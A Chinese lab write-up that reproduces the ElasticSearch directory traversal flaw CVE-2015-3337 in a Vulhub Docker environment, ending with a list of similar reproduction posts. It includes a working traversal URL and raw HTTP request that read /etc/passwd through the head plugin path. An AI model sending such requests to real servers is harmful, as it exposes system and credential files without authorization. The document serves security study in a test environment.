利用Vulnhub复现漏洞 - ElasticSearch 目录穿越漏洞(CVE-2015-3337)测试环境
2019-07-02 17:51
2071 查看
ElasticSearch 目录穿越漏洞(CVE-2015-3337)测试环境
Vulnhub官方复现教程
https://vulhub.org/#/environments/elasticsearch/CVE-2015-3337/
漏洞原理
在安装了具有“site”功能的插件以后,插件目录使用…/即可向上跳转,导致目录穿越漏洞,可读取任意文件。没有安装任意插件的elasticsearch不受影响。
复现漏洞
启动环境
https://blog.csdn.net/JiangBuLiu/article/details/93853056
进入路径为
cd /root/vulhub/elasticsearch/CVE-2015-3337
搭建及运行漏洞环境:
docker-compose build && docker-compose up -d
用时:7分钟
漏洞复现
测试环境默认安装了一个插件:
elasticsearch-head,主页在此:https://github.com/mobz/elasticsearch-head
访问
http://your-ip:9200/_plugin/head/../../../../../../../../../etc/passwd读取任意文件(不要在浏览器访问):
GET /_plugin/head/../../../../../../../../../etc/passwd HTTP/1.1 Host: your-ip:9200 Accept:*/* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0 Connection: close
head插件
head插件提供了elasticsearch的前端页面,访问
http://your-ip:9200/_plugin/head/即可看到,不多说了。
相关文章推荐
- 利用Vulnhub复现漏洞 - Joomla 3.4.5 反序列化漏洞(CVE-2015-8562)
- 利用Vulnhub复现漏洞 - Gitea 1.4.0 目录穿越导致命令执行漏洞
- 利用Vulnhub复现漏洞 - Joomla 3.7.0 (CVE-2017-8917) SQL注入漏洞环境
- 利用Vulnhub复现漏洞 - Jmeter RMI 反序列化命令执行漏洞(CVE-2018-1297)
- 利用Vulnhub复现漏洞 - ffmpeg 任意文件读取漏洞/SSRF漏洞 (CVE-2016-1897/CVE-2016-1898)
- 利用Vulnhub复现漏洞 - OpenSSH 用户名枚举漏洞(CVE-2018-15473)
- 利用Vulnhub复现漏洞 - libssh 服务端权限认证绕过漏洞(CVE-2018-10933)
- 利用Vulnhub复现漏洞 - Nginx越界读取缓存漏洞(CVE-2017-7529)
- 利用Vulnhub复现漏洞 - GhostScript 沙箱绕过(命令执行)漏洞(CVE-2019-6116)
- 利用Vulnhub复现漏洞 - Imagetragick 命令执行漏洞(CVE-2016–3714)
- 利用Vulnhub复现漏洞 - Jackson-databind 反序列化漏洞(CVE-2017-7525)
- 利用Vulnhub复现漏洞 - mini_httpd任意文件读取漏洞(CVE-2018-18778)
- 利用Vulnhub复现漏洞 - Mysql 身份认证绕过漏洞(CVE-2012-2122)
- 利用Vulnhub复现漏洞 - Gitlab 任意文件读取漏洞(CVE-2016-9086)
- 利用Vulnhub复现漏洞 - JBoss 4.x JBossMQ JMS 反序列化漏洞(CVE-2017-7504)
- 利用Vulnhub复现漏洞 - Nexus Repository Manager 3 远程命令执行漏洞(CVE-2019-7238)
- 利用Vulnhub复现漏洞 - Gogs 任意用户登录漏洞(CVE-2018-18925)
- 利用Vulnhub复现漏洞 - Nginx 文件名逻辑漏洞(CVE-2013-4547)
- 利用Vulnhub复现漏洞 - Jenkins-CI 远程代码执行漏洞(CVE-2017-1000353)
- 利用Vulnhub复现漏洞 - Electron WebPreferences 远程命令执行漏洞(CVE-2018-15685)